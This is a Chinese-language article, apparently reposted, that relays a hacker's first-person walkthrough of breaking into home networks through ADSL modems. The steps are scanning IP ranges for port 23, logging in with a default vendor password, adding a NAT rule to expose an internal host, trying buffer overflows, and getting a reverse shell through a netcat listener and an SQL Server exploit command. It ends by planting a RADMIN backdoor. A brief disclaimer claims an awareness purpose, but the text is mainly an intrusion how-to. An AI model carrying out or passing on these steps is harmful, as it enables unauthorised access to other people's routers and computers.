網管要警惕：入侵 ADSL 就這麼簡單！

聲明！這不是教給大家如何供給別人，只是為了達到知己知彼的目的，大家好有所防范。記住，不要供給別人喲，當心讓人家把你曝屍街頭！

其實，很可也不是想象中的神秘，只要有點知識和技術，你同樣可以爽一把，很久以前，我對這個很著迷，但是，後來發現入侵別人實在是很不道德，最終放棄了！現在，你也不要學者供給別人，沒意義的！

　　這是一位所謂的＂黑客＂的口述，你不妨看一下，也許你看完後對他的技術性做法不是完全明白，但是你肯定會感到一身冷汗，因為我們現在使用ADSL已經日益廣泛，但我們的安全意識還不是很強．聽完他的口述希望大家在日後能加強安全防范！

　　口述：

　　也許看爛了網上已有的常規黑客攻擊手段，對一些陳舊的入侵手法早已厭煩，近來我對ADSL MODEM的路由功能產生了濃厚的興趣，經過一番努力，我終於找到了穿透ADSL路由入侵內網的方法，在這裡和各位一起分享我的心得。

　　一．掃描

　　現在很多ADSL MODEM都是通過 80 23 21 三個端口來管理，但80 21端口有很多服務器都有打開，沒怎麼特征性，於是我選擇了23端口，打開我的至愛：SUPPERSCAN，填上我所在地區的IP段，（跨多幾段都沒關系，反正SUPPERSCAN的速度就是快）眨眼間，結果出來了，開23的主機還真不小啊：）我挑了幾台出來，在浏覽器那裡輸入IP：218.xxx.xxx.xxx，OK。登陸對話框出來了，輸入USER：ADSL pass:adsl1234（因為我這裡的adsl modem一般是華碩的，缺省是adsl adsl1234）bingle 一矢中的，現在我就是上帝。

　　二．映射

　　入侵已經成功了一半，要進一步入侵內網，我們要進行端口映射，但是我連內網的拓撲，都不知道（更不用說內網主機的端口開放情況了）又怎麼映射呢？在此，我選擇了猜測。一般來說，MODEM的內網IP缺省是192．168．1．1，而大多數就把自己主機的IP設成192.168.1.2。因此我們只要試試把192．168．1．2的端口映射出來就行了（但如果使用了dhcp就麻煩了）。但是192．168．1．2到底開放了什麼端口，我們根本就不知道啊，呵呵，既然不知道，那麼我就把他整台主機透明地映射到外網，具體做法如下：進入NAT選項---添加NAT規則---BAMID---填入主機IP：192．168．1．2，到此192．168．1．2已經透明地映射到192．168．1．1上了，我們訪問ADSL MODEM就等於訪問主機192．168．1．2了

　　三．檢測漏洞

　　現在我們再請出SUPPERSCAN對218．xxx．xxx．xxx進行掃描，呵，看到沒有？掃描結果已經不同了，開放的端口是139 1433等，剛才只是開放了80 23 21 而已（也就是說我們的映射已經成功了）該是X-SCAN出手了，用它來掃弱口令最好不過了，但掃描的結果令人失望，，一個弱口令也沒有，看來管理員還不算低B啊。

　　四．溢出

　　既然沒有弱口令，也沒開80，那只好從溢出方面著手了，但沒開80 21 也就webdav .sevr-u的溢出沒戲了，很自然，我向導了RPC溢出，但實踐證明RPC溢出也是不行的，LSASS溢出也不行 。

　　五．募然回首，那人卻在，燈火闌珊處

　　看來這管理員還是比較負責的，該打的補丁都打上了，這時侯，我的目光轉移到1433上了（嘿，不知道他打了SQL補丁沒有？）心動不如行動，現在只好死馬當活馬醫了，於是
　　nc -v -l 99
　　sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99
　　bingle 成功地得到一個shell了。

　　六．設置後門

　　到這裡，我們的入侵已經成功了，余下的是掃尾留後門，至於後門，我一般都是用FTP上傳RADMIN上去的，呵呵，這裡不詳談了，相信各位都知道。